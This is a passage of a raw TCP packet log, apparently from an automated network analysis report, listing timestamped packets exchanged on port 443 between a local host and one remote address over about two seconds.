                                                                      Dec 27, 2024 09:05:31.768692017 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.768779039 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.772495985 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.772567034 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.776287079 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.776365042 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.782938004 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.783032894 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.900651932 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.900736094 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.904078960 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.904149055 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.908416033 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.908502102 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.930533886 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.930639982 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.930938005 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.931005955 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.931065083 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.931138992 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.931164026 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.931221962 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.931354046 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.931423903 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.933370113 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.933440924 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.937290907 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.937366962 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:31.942173004 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:31.942280054 CET49731443192.168.2.7150.241.97.10
Dec 27, 2024 09:05:31.946047068 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.946121931 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:31.950366974 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.950460911 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:31.982197046 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.982266903 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:31.985929966 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.986011982 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:31.989917040 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.990031004 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:31.996073961 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:31.996171951 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.113291979 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.113375902 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.117302895 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.117398024 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.121922016 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.122015953 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.125725985 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.125828981 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.129652023 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.129725933 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.134711027 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.134854078 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.138963938 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.139084101 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.142913103 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.142975092 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.147142887 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.147205114 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.151211023 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.151319981 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.155003071 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.155073881 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.160281897 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.160343885 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.191262960 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.191368103 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.195003033 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.195074081 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.198878050 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.198980093 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.204365015 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.204437971 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.322388887 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.322463036 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.327059031 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.327116966 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.330915928 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.331008911 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.334932089 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.335025072 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.338612080 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.338715076 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.343571901 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.343651056 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.347567081 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.347635984 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.351291895 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.351355076 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.356009007 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.356066942 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.360127926 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.360394001 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.363898993 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.363962889 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.369667053 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.369744062 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.399797916 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.399868011 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.404140949 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.404208899 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.407963037 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.408052921 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.432003021 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.432076931 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.532215118 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.532291889 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.535295010 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.535367966 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.540558100 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.540633917 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.544074059 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.544133902 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.548032999 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.548105955 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.552949905 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.553016901 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.556830883 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.556932926 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.560612917 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.560699940 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.565331936 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.565428972 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.569228888 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.569324970 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.573117971 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.573209047 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.576833010 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.576951027 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.582283974 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.582355976 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.613218069 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.613400936 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.616978884 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.617069006 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.620953083 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.621021032 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.644304037 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.644388914 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.744690895 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.744837046 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.749447107 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.749546051 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.753226042 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.753294945 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.757004023 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.757070065 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.760943890 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.761022091 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.765676975 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.765739918 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.769438028 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.769514084 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.773298979 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.773366928 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.777954102 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.778017998 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.781774998 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.781848907 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.785449028 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.785506010 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.792196035 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.792249918 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.821213007 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.821304083 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.825984001 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.826083899 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.830004930 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.830076933 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.854451895 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.854535103 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.953718901 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.953819990 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.957386971 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.957495928 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.962304115 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.962457895 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.966162920 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.966243029 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.969857931 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.969917059 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.974791050 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.974889994 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.978564024 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.978662968 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.982484102 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.982558012 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.986960888 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.987021923 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.990720034 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.990791082 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:32.994560957 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:32.994631052 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.001310110 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.001382113 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.031107903 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.031196117 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.035192013 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.035280943 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.038947105 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.039035082 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.063663006 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.063739061 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.163533926 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.163624048 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.166542053 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.166635036 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.171524048 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.171592951 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.175303936 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.175374985 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.179104090 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.179183006 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.182816029 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.182908058 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.187608004 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.187702894 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.191432953 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.191519976 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.196069002 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.196141005 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.199775934 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.199847937 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.203702927 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.203763008 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.207529068 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.207604885 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.214405060 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.214473963 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.244390965 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.244571924 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.248054981 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.248131990 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.251832008 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.251904011 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.275717020 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.275791883 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.375813961 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.375895023 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.379544973 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.379612923 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.384428978 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.384501934 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.388143063 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.388277054 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.391983986 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.392054081 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.395756960 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.395843983 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.400604010 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.400671005 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.404395103 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.404463053 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.408950090 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.409030914 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.412662029 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.412738085 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.416511059 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.416580915 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.422787905 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.422892094 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.453293085 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.453396082 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.457076073 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.457151890 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.460812092 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.460876942 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.484874964 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.484963894 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.584726095 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.584795952 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.588897943 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.589075089 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.592597008 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.592662096 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.597511053 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.597573996 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.601213932 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.601278067 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.722183943 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.722311020 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.959964991 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.960022926 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.960041046 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.960067034 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.960083008 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.960095882 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.960127115 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.960133076 CET    443  49731  150.241.97.10  192.168.2.7
Dec 27, 2024 09:05:33.960218906 CET  49731    443  192.168.2.7    150.241.97.10
Dec 27, 2024 09:05:33.960330009 CET    443  49731  150.241.97.10  192.168.2.7
                                                                      Dec 27, 2024 09:05:33.960381031 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.960395098 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.960400105 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.960438967 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.960475922 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.961253881 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.961313009 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.961834908 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.961899996 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.961940050 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.961991072 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.962677956 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.962737083 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.963001013 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.963057995 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.963757038 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.963826895 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.963843107 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.963880062 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.963896036 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.963901043 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.963921070 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.963941097 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.965003967 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.965065956 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.965101957 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.965154886 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.965938091 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.965991020 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.966000080 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.966042042 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.966048002 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.966053009 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.966082096 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.966101885 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.967024088 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.967076063 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.967098951 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.967103958 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.967144966 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.967741013 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.967797041 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.968137980 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.968226910 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.968314886 CET49731443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:33.968321085 CET44349731150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:33.968408108 CET49731443192.168.2.7150.241.97.10
